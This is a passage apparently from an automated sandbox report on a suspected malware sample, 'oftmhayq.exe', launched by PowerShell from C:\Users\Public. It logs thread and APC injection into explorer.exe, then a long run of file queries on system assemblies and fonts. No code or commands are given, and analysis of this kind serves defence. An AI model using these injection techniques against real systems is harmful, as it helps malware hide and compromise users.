          Source: C:\Users\Public\oftmhayq.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\oftmhayq.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\oftmhayq.exeThread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe' Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe' Jump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exeJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exeJump to behavior
          Source: explorer.exe, 0000001F.00000002.530564683.0000000001980000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 0000001F.00000000.506248785.0000000006860000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000001F.00000002.530564683.0000000001980000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000001F.00000002.530564683.0000000001980000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Users\Public\oftmhayq.exe VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
